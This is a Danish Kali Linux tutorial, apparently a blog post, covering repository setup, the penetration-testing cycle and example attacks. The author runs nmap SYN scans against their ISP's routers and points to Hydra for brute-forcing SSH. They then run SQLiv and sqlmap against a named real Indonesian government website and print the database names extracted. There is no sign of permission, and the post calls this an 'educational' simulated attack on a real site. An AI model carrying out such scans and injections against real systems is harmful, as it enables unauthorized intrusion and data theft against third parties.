Kali Linux Tutorial

Kali Linux Tutorial



Hvis du er ekspert eller i det mindste fortrolig med Linux, kommandoer og miljø, lige har installeret Kali Linux på din maskine, ønskede at blive en Master i Kali Linux eller en etisk hacker, så er du på det rigtige sted. I denne artikel vil jeg dække en Kali Linux -vejledning til Linux -brugere, der ikke allerede kender Kali, og få dig i gang med nogle af de grundlæggende teknikker, der bruges til hacking og sikkerhedstest, mens du bruger Kali.

Hvad er Kali Linux?

Kali Linux, ( første gang udgivet den 13. marts, 2013 ), der formelt blev kendt som BackTrack, udviklet af sikkerhedsfirmaet Offensive Security, er en retsmedicinsk og sikkerhedsfokuseret distribution baseret på Debians Testing-afdeling. Kali Linux er designet med penetrationstest, datagendannelse og trusselsregistrering i tankerne. Projektet skiftede til en rullende udgivelsesmodel tidligere på året i et forsøg på at levere mere opdaterede sikkerhedsværktøjer til distributionens brugere. Kali Linux er gratis, og vil altid være det. Det har 600+ penetrationstestværktøjer inkluderet.







Hvorfor Kali Linux? Er det rigtigt for dig?

Kali Linux har vundet stor popularitet for nylig. Og der er en grund bag det. Hacking er tilbage som den sejeste ting at gøre i populærkulturen, og dette kan tilskrives betydeligt tv-serien Mr. Robot. Mr. Robots popularitet hjalp Kali Linux med at få nye brugere. Folk med næsten ingen viden om Linux eller noget relateret til computersikkerhed forsøger nu at bruge Kali som deres vigtigste Linux -distribution.



Vores mest avancerede penetrationstestdistribution, nogensinde. - Kali Linux -udviklere. (Det er skrevet på hovedsiden i Kali.org øverst på siden.) Hvad får du ud af den erklæring? Lægger du mærke til dette: APTD (Advanced Penetration Testing Distribution)? Der er ikke noget udtryk for hacking her bogstaveligt talt. Kali Linux er det samme som andre Linux -distributioner. Simpelthen sagt, det er en Linux-distribution pakket med sikkerhedsrelaterede værktøjer og målrettet mod netværks- og computersikkerhedseksperter. Brugen af ​​Kali Linux fokuserer imidlertid kun på sikkerhed og retsmedicin.



En Linux -distribution er ikke andet end et bundt, der indeholder Linux -kernen, et sæt kerneværktøjer og applikationer og nogle standardindstillinger. Så Kali Linux tilbyder ikke noget unikt i den forstand, at de fleste af de leverede værktøjer kunne installeres på enhver Linux -distribution.





Kali Linux er specifikt gearet til at opfylde kravene til professionel penetrationstest og sikkerhedsrevision. Det er rettet mod en bestemt delmængde af Linux -brugere. Pentestere, hackere osv. Det er ikke en anbefalet distribution, hvis du forventer Kali til generel Linux-desktop til udvikling, webdesign, spil, kontor osv. Kali kan give dig nogle udfordringer, selvom du er en erfaren Linux-bruger .

Ting at gøre efter installation af KALI LINUX

Efter installation af Kali Linux kan du måske undre dig over, hvad du skal gøre med dette, ikke? Alle står over for dette problem, bare rolig.



TRIN 1: OPSÆTNING AF REPOSITORIET

For det første ved du måske allerede dette, men det er afgørende at indstille depotet korrekt. Som sagt har Kali Linux rullende udgivelsesmodel et forsøg på at levere mere opdaterede sikkerhedsværktøjer til distributionens brugere. Generelt, hvis du har Kali Linux nyinstalleret, refererer depotet til de medier, du bruger til at installere. For at løse dette skal du ændre lageret til det officielle Kali Linux -arkiv. Den nødvendige fil findes under /etc/apt/sources.list . Åbn filen med leafpad -teksteditor, og erstat standardlageret til dette officielle Kali Rolling -arkiv:

deb http://http.kali.org/kali kali-rolling main contrib non-free # For source package access, uncomment the following line # deb-src http://http.kali.org/kali kali-rolling main contrib non-free 

TRIN 2: OPDATER OG OPGRADER DIN KALI LINUX

Efter denne opdatering og opgradering af dit system skal du synkronisere dit Kali Linux til den nyeste version. For at gøre det skal du åbne terminalen og skrive:

apt update -y && apt upgrade -y && apt dist-upgrade 

Kommandoen apt update downloader og henter pakken lister oplysninger fra lagrene og opdaterer dem for at få oplysninger om de nyeste versioner af pakker og deres afhængigheder.

Den passende opgraderingskommando downloader og installerer nyere version af pakkerne med installerede Kali Linux -pakker, så længe den ikke har fejl på afhængigheder.

Den passende dist-opgradering opdaterer alle pakker til den nyeste tilgængelige version uanset hvad. Og også installere og fjerne afhængigheder efter behov (installer afhængigheder for at tilfredsstille pakker, naturligvis, men også fjern afhængigheder, der blev forældreløse, hvis en pakke, der blev opdateret, ikke længere havde brug for afhængigheden.

GRUNDLÆGGENDE PENETRATIONSTESTKONCEPT MED KALI LINUX

Når du har udført disse trin med succes, er der tre hoved ting, du kan gøre med Kali Linux baseret på det målrettede system, herunder:

  1. Hacking af trådløst netværk - Wifi -hacking, Phising, ARP -forgiftning osv.
  2. Webapps hacking -SQL-injektion, Forfalskning på tværs af websteder (CSRF), Web Phising osv.
  3. Enhedshacking - Udnyt målmaskinen for at få kontrol over den.

Jeg inkluderer ikke IoT -hacking, det betyder ikke, at Kali Linux ikke har nogen form for dette formål. Men det kan bogstaveligt talt også tilhøre Device Hacking. Da enheden har fysisk udseende og form. I denne vejledning dækkede jeg den grundlæggende viden om dem. Da Kali Linux er enorm, passer det ikke i en artikel!

Du skal også vide, penetrationstestcyklussen eller proceduren. De er:

  1. Rekognoscering - Informationsindsamling
  2. Scanning
  3. Operation
  4. Efter udnyttelse

TRÅDLØS NETVÆRKSHACKING MED KALI LINUX

Med hensyn til hacking af trådløst netværk kan offeret variere. Fordi trådløse netværk består af flere ting, f.eks. ISP (internetudbyder), routeren og dens makker (modem, hub, switch osv.) Og klienterne (brugere, CCTV, fjerncomputer osv.). De har også sårbare muligheder.

Internettet er en stor og kompleks sammenlægning af netværkshardware, forbundet med gateways. Det er vigtigt at spore den rute, dine pakker følger, for at vide, hvordan du når et bestemt værtsnavn eller en mål -IP -adresse.

Kali Linux har et indbygget værktøj kaldet Traceroute. Traceroute udnytter IP -protokollens tid til at leve mark og forsøger at fremkalde et ICMP TIME_EXCEEDED svar fra hver gateway langs stien til en eller anden vært. Traceroute forsøger at spore den rute, en IP -pakke ville følge til en internetvært ved at lancere sondepakker med en lille TTL (tid til at leve) og derefter lytte efter en ICMP -tid, overskredet svar fra en gateway. Jeg vil give dig og et eksempel på, hvordan du sporer en ISP -router, der bruges til at håndtere vores forbindelse ved hjælp af Traceroute.

1. Anerkendelse

Informationsindsamling er den vigtigste springstart, gå ikke glip af dette trin. I dette trin er vores formål at få så meget som muligt nyttig information, vi kunne få, og derefter bruges disse oplysninger til yderligere trin.

Først skal du åbne en terminal og skrive denne kommando for at begynde at spore vejen til stedet, i dette tilfælde satte jeg stedet til google.com.

traceroute google.com 

Traceroute Skærmbillede

2. Scanning

Når vi har startet kommandoerne, viser den, hvor vores pakke går i rækkefølge. Som du kan se ovenfor, fik jeg 3 humle, hvoraf en af ​​dem er min ISP -server. Den første IP på listen er min router, der fungerer som en gateway. Og de to næste af dem tilhører min internetudbyder. Lad os nu kontrollere den service, de kører ved hjælp af Nmap. Så de mål, vi skal scanne, er 10.152.192.1 og 10.13.223.102 . I terminalen kørte jeg følgende kommando:

nmap -v -sS [IP Target] -Pn 

Lad os nedbryde kommandoens argument:

-v = Aktiver verbosity -tilstand

-sS = Brug TCP SYN -scanningsteknik

-Pn = Behandl alle værter som online -spring host -opdagelse over

Og her er resultatet, vi fik.

nmap skærmbillede 2

Desværre er alle havne på 10.152.192.1 er filtreret, betyder det, at alle indkommende TCP -forbindelser er blokeret af IDS eller Firewall på denne IP. Lad os nu tage en ny scanning til det andet mål.

nmap skærmbillede 1

3. Betjening

I denne procedure har jeg ikke til hensigt at udføre den reelle udnyttelse, i stedet viser jeg dig hvordan. Baseret på Nmap -scanningsresultatet ovenfor ved vi, at denne IP har SSH -server, der kører på port 22, og den er åben. Det er åbent for at blive brutalt tvunget, haha! Vi fandt hullet, denne SSH -server er det mulige hul, vi kunne prøve at få adgang til. Der er flere værktøjer i Kali Linux, der understøtter bruteforce eller ordbogsangreb mod SSH -protokollen. Den mest populære og kraftfulde er Hydra.

Ok, det var en grundlæggende procedure, der udførte en penetrationstest mod en målrettet server, som i vores eksempel her er min ISP -server.

WEBAPPS HACKING MED KALI LINUX

Faktisk, hvis du brænder for dette, kan du konfigurere dit hackingmiljø ved at installere DWVA (Damn Vulnerable Web App) i din Kali Linux. Det er en PHP/MySQL webapplikation, der har en masse sårbare huller. Dets hovedmål er at være et hjælpemiddel for sikkerhedspersonale til at teste deres færdigheder og værktøjer i et juridisk miljø og hjælpe webudviklere med bedre at forstå processerne til sikring af webapplikationer. Du kan få DWVA gratis på Github her: https://github.com/ethicalhack3r/DVWA.

For nu vil jeg vise dig, hvordan du gør Web Apps Hacking på et rigtigt websted. Men lov mig, det er kun begrænset til uddannelsesformål. Vi vil simulere et reelt angreb på det rigtige sted ved hjælp af SQL -injektion.

Forudsætning

Værktøjer omfattet:

-Whatweb (forudinstalleret)

-Nmap (forudinstalleret)

- SQLiv (installer manuelt)

-SQLMap (forudinstalleret)

Vi har brug for endnu et ekstra værktøj, der er tilgængeligt på Github her: https://github.com/Hadesy2k/sqliv, installer det først til vores Kali Linux. Dette værktøj hedder SQLiv, som er i stand til at udføre målrettet scanning ved at levere specifikt domæne (med crawling). Indtast terminalen:

git clone https://github.com/Hadesy2k/sqliv.git cd sqliv && sudo python2 setup.py -i 

Mål: www.trenggalekkab.go.id

1. Anerkendelse

Saml så mange nyttige oplysninger, som vi kunne få. Vi kunne åbne websiden og registrere, hvilket program der kører på dette websted. Lad os for det første kontrollere, hvilken slags websted det er. Vi vil bruge whatweb til at gøre det.

whatweb www.trenggalekkab.go.id 

Hvilket webskærmbillede

Som du kan se resultatet ovenfor, er målet placeret i Indonesien. Det kører Apache v2.2.27 på sin webserver og har også PHP v5.4.31 , den har en IP -adresse 103.247.21.142 . Okay, tag det til efterretning. Du skal muligvis besøge dens webside og lede efter den konstruerede fil eller side, URL -parametre eller endda loginformular. For nu har vi brug for den IP -adresse til det næste trin, der scanner.

2. Scanning

Som før bruger vi Nmap igen til at scanne, hvilke porte og tjenester der kører på målet.

nmap -v -sS 103.247.21.142 

Og her er resultatet, vi fik:

Completed SYN Stealth Scan at 21:22, 261.93s elapsed (1000 total ports) Nmap scan report for ip-103-247-21-142.wifian.net.id (103.247.21.142) Host is up (0.069s latency). Not shown: 985 closed ports PORT STATE SERVICE 21/tcp open ftp 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 143/tcp open imap 212/tcp open anet 443/tcp open https 465/tcp open smtps 587/tcp open submission 993/tcp open imaps 995/tcp open pop3s 3128/tcp filtered squid-http  3306/tcp open mysql  

Der er masser af åbne porte, der håndterer hver service på målet, men den, der ser iøjnefaldende ud, er, at mysql-service på port 3306. Det er angivet, at dette websted bruger mysql at administrere deres oplysninger i databaser. Så spekulerer jeg på, om der er sårbarheder ved SQL -injektion på dette websted. Så jeg scanner stedet igen ved hjælp af SQLiv, vi lige har installeret. Jeg skrev kommandoen:

sqliv -t www.trenggalekkab.go.id 

SQLHacking ScreenShot1

Vi fandt 2 mulige SQL -sårbare webadresser på dette websted. Noter disse webadresser.

3. Betjening

Ok, vi har SQL -sårbare webadresser og klar til udførelse. For at gøre det vil vi bruge SQLMap. Syntaksen er:

sqlmap [Vulnerable URL] --dbs 

Kommandoen skal se sådan ud:

 sqlmap -u "http://www.trenggalekkab.go.id/berita.php?page=208" --dbs 

–Dbs -argumentet er at fortælle SQLMap at hente måldatabaser. Her er output vi fik:

[INFO] the back-end DBMS is MySQL web application technology: PHP 5.4.31, Apache 2.2.27 back-end DBMS: MySQL 5 [21:46:04] [INFO] fetching database names [21:46:04] [INFO] the SQL query used returns 2 entries [21:46:04] [INFO] resumed: information_schema [21:46:04] [INFO] resumed: trengkab_trg available databases [2]: [*] information_schema [*] trengkab_trg 

SQLMap fandt 2 databaser, men kun en blandt dem, der indeholder følsomme data, f.eks. En admin -legitimationskonto. Det er på trengkab_trg. Efter at vi har fundet databaserne, er der stadig et andet trin, vi skal gøre. Det vil sige at finde tabellerne og kolonnerne, og det sidste trin er at dumpe dataene. Jeg vil ikke vise dig, hvordan du i dette afsnit bruger dette mål. I det mindste kender du den grundlæggende idé om angrebscyklussen og bruger nogle værktøjer.

HACKING ENHED

I en fremtidig artikel på dette websted vil vi dække enhedshacking, følg med. Som en forhåndsadvarsel vil du gerne sikre dig, at du kender noget Python til dette.